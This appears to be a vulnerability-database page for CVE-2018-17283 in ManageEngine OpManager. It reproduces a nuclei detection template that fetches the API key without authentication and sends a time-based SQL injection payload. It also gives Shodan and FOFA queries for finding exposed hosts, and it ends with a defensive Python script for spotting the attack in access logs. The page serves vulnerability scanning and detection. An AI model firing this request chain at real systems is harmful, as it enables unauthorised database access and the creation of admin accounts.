Zoho ManageEngine OpManager - SQL Injection

27 Jun 2026 03:01:36 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Zoho ManageEngine OpManager allows SQL Injection due to unauthenticated /oputilsServlet requests.

Related

Reporter | Title | Published | Family
Circl | CVE-2018-17283 | 23 May 2025 21:02 | circl
CNVD | ZOHO ManageEngine OpManager Privilege Bypass Vulnerability | 21 Sep 2018 00:00 | cnvd
Check Point Advisories | Zoho ManageEngine OpManager oputilsServlet Authentication Bypass (CVE-2018-17283) | 4 Dec 2018 00:00 | checkpoint_advisories
Check Point Advisories | Zoho ManageEngine OpManager SQL Injection (CVE-2018-17823; CVE-2018-17283) | 20 Feb 2019 00:00 | checkpoint_advisories
CVE | CVE-2018-17283 | 21 Sep 2018 03:00 | cve
Cvelist | CVE-2018-17283 | 21 Sep 2018 03:00 | cvelist
NVD | CVE-2018-17283 | 21 Sep 2018 03:29 | nvd
OSV | CVE-2018-17283 | 21 Sep 2018 03:29 | osv
Prion | Sql injection | 21 Sep 2018 03:29 | prion
VulnCheck KEV | VulnCheck KEV: CVE-2018-17283 | 6 Jan 2024 00:00 | vulncheck_kev

id: CVE-2018-17283

info:
  name: Zoho ManageEngine OpManager - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.
  impact: |
    Unauthenticated attackers can execute SQL injection attacks to access or modify database contents, add administrator users, or extract sensitive information including credentials.
  remediation: |
    Upgrade to ManageEngine OpManager version 12.3 Build 123196 or later.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-17283
    cwe-id: CWE-89
    epss-score: 0.60097
    epss-percentile: 0.99017
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/x-f1v3/forcve/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17283
  metadata:
    verified: true
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"OpManager"
    fofa-query: title="OpManager"
  tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        GET /oputilsServlet?action=getAPIKey HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: api_key
        regex:
          - 'API_KEY=([0-9a-z]+)'
        internal: true

  - raw:
      - |
        POST /api/json/device/setManaged?apiKey={{api_key}}&manage=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        name=KcP7OGhC';select%20pg_sleep(6);%20--

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains(body,"result")'
          - 'contains(content_type,"application/json")'
        condition: and
# digest: 4a0a00473045022100da4a5745ccc8085e7ec064d4bf16724c8d70c8417fbfb0f3f947c792aad7ed7802204a0d37baafab5e352eaab3acbbd818e99a66d0b0e022e73cf81927eda17fec8c:922c64590222798bb761d5b6d8e72950
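
To check whether an instance was probed before it was upgraded, the two-step request sequence in the template above can be searched for in web access logs. The Python below is an added example, not part of the template or of ProjectDiscovery's code; it assumes Combined Log Format lines (for instance from a reverse proxy in front of OpManager), and the sample log lines and the `review` helper name are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Combined Log Format; IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2018:13:55:36 +0000] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 200 58 "-" "curl/7.58.0"
198.51.100.7 - - [10/Oct/2018:13:55:44 +0000] "POST /api/json/device/setManaged?apiKey=0123abcd&manage=false HTTP/1.1" 200 31 "-" "curl/7.58.0"
203.0.113.20 - - [10/Oct/2018:14:02:10 +0000] "GET / HTTP/1.1" 200 912 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2018:14:05:01 +0000] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status (assumed log layout)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
KEY_PATH = "/oputilsServlet"
# API endpoints named in the CVE description as reachable with the leaked key
FOLLOW_UP = ("/api/json/device/setManaged", "/api/json/v2/admin/addUser")

def review(log_text):
    """Map each client that successfully fetched the API key to its key
    fetches and any later apiKey-bearing calls to the endpoints above."""
    findings = defaultdict(lambda: {"key_fetch": [], "follow_up": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if (url.path == KEY_PATH and "getAPIKey" in query.get("action", [])
                and status == "200"):
            # A 200 here means the key was served; the log alone cannot show
            # whether the caller was authenticated, so treat it as a lead.
            findings[ip]["key_fetch"].append(ts)
        elif url.path in FOLLOW_UP and "apiKey" in query and ip in findings:
            # Same client used an API key after fetching one: higher priority.
            findings[ip]["follow_up"].append((ts, method, url.path))
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in review(SAMPLE_LOG).items():
        level = "HIGH" if hits["follow_up"] else "REVIEW"
        print(level, ip, hits)
```

Clients with a non-empty `follow_up` list warrant a check of the OpManager user table for unexpected administrator accounts, since the description names `/api/json/v2/admin/addUser` as one use of the disclosed key.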


04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.1 (High risk)
CVSS 2: 5
CVSS 3: 7.5
EPSS: 0.60097